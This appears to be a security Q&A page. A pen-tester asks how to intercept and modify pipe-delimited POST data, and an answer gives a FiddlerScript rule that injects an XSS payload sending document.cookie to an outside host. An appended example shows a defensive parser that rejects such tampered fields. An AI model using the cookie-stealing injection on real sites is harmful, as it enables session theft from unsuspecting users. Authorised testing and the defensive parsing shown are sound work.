1

I'm trying to pen-test a web app that consumes a POST request containing raw data like this:

1|2|3|4|1|5|6|5|7|8|1|9|21|10|11|12|13|11|14|15|16|42|17|11|18|19|16|489|20|16|618|21|16|193|22|11|23|8|11|24|25|11|26|27|16|340|28|11|29|30|11|31|32|16|378|33|-7|34|11|35|36|16|130|37|16|55|38|-7|39|11|40|41|42|1|7|8|1|9|21|10|11|43|13|11|44|15|16|34|17|11|45|19|16|1058|20|16|480|21|16|190|22|11|46|8|11|47|25|11|48|27|16|322|28|11|49|30|-32|32|16|220|33|-28|34|-25|36|16|134|37|16|48|38|-28|39|-32|41|-22|7|8|1|9|21|10|11|50|13|11|51|15|16|33|17|11|52|19|16|934|20|16|669|21|16|185|22|11|53|8|11|54|25|11|55|27|16|98|28|11|56|30|-16|32|16|84|33|-45|34|11|57|36|16|139|37|16|49|38|11|58|39|11|59|41|-22|7|8|1|9|21|10|11|60|13|11|61|15|16|53|17|11|62|19|16|695|20|16|614|21|16|177|22|-49|8|11|63|25|11|64|27|16|131|28|11|65|30|-16|32|16|56|33|-65|34|11|66|36|16|151|37|-6|38|-65|39|-59|41|-22|7|8|1|9|21|10|11|67|13|11|68|15|16|40|17|11|69|19|16|197|20|16|147|21|16|110|22|11|70|8|11|71|25|11|72|27|16|341|28|11|73|30|-16|32|16|339|33|-81|34|11|74|36|16|133|37|16|20|38|-81|39|11|75|41|-22|

I.e. the POST data can't be separated into parameters and values the way Tamper Data handles them. That makes the plugin very unfriendly for dealing with this kind of POST data. I can't even go to the main Tamper Data screen and copy the raw data from the request history list, since that screen is blocked by the smaller window handling the current HTTP request. Thus, I can access and copy the raw data only when the request has already been declined or sent without the required modification.

Are there similar tools (browser plugins, HTTP proxies), or at least the source code of Tamper Data, that can be used to work with and modify this kind of POST data in the manner Tamper Data does?

4

2 Answers

2

Try Fiddler; it lets you intercept and tamper with raw requests.

answered 2013-06-12T22:10:44.110
0

The most suitable way is to use FiddlerScript (download the FiddlerScript Editor, http://fiddler2.com/fiddlerscript-editor; it opens the required file after launch).

I have customized

// m_Replace16 is the flag toggled by the custom Rules menu item
// described below; its declaration is not shown in the answer.
static function OnBeforeRequest(oSession: Session) {

    if (m_Replace16) {
        var post_body: String = oSession.GetRequestBodyAsString();
        FiddlerApplication.Log.LogString(post_body);
        post_body=post_body.Replace("|8888","|<script>img = new Image(); img.src = \"http://httpz.ru/n22ref260pd.gif?\"+document.cookie;</script>");
        FiddlerApplication.Log.LogString(post_body);
        oSession.utilSetRequestBody(post_body);
    }
}

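I.e. a new menu item was added that forces modification of all outgoing requests: "|8888" is replaced with the second parameter, i.e. the injection.

The first line converts the request body to a string var

The second line posts it to the Fiddler log

The third line replaces the required value with some injection

The fourth line posts the modified var body to the log

The fifth line updates the original request's raw body with the modified one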

answered 2013-06-26T18:43:49.687
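
The receiving side of the substitution shown in the second answer, as an added example that is not part of either answer or of the application under test: a strict server-side parser that accepts a pipe-delimited body only when every field is an integer. It assumes, based on the sample in the question, that all fields are signed decimal integers and that the body ends with a trailing `|`; `parsePipeBody`, `FIELD_RE`, `MAX_FIELDS` and both sample bodies are constructed for illustration.

```javascript
// Added example (not from the page): strict parsing of a pipe-delimited body.
// Assumption: every field is a signed decimal integer and the body ends with
// a trailing "|", as in the sample shown in the question.
const FIELD_RE = /^-?\d{1,9}$/; // bounded length, optional leading minus only
const MAX_FIELDS = 4096;        // hypothetical cap on fields per request

function parsePipeBody(raw) {
  if (typeof raw !== "string" || raw.length === 0) {
    return { ok: false, errors: [{ index: -1, reason: "empty body" }] };
  }
  if (!raw.endsWith("|")) {
    return { ok: false, errors: [{ index: -1, reason: "missing trailing delimiter" }] };
  }
  const tokens = raw.slice(0, -1).split("|");
  if (tokens.length > MAX_FIELDS) {
    return { ok: false, errors: [{ index: -1, reason: "too many fields" }] };
  }
  const fields = [];
  const errors = [];
  tokens.forEach((tok, index) => {
    if (FIELD_RE.test(tok)) {
      fields.push(Number(tok));
    } else {
      // Keep only a truncated copy of the offending token for the log entry.
      errors.push({ index, reason: "not an integer", sample: tok.slice(0, 32) });
    }
  });
  // Reject the whole request on any bad field; never pass it on partially parsed.
  return errors.length ? { ok: false, errors } : { ok: true, fields };
}

// Constructed sample bodies: a short clean one, and the same body after a
// substring substitution of the kind the FiddlerScript rule performs.
const CLEAN = "1|2|3|4|1|5|6|5|7|8|1|9|21|10|11|8888|13|-7|";
const TAMPERED = CLEAN.replace("|8888", "|<script>/*constructed marker*/</script>");

console.log(parsePipeBody(CLEAN).ok);         // clean body is accepted
console.log(parsePipeBody(TAMPERED).errors);  // tampered field is reported by index
```

Rejecting on the first non-conforming field and logging its index gives a detection signal for this kind of proxy-side tampering; values that are later rendered into HTML still need output encoding at the point of rendering.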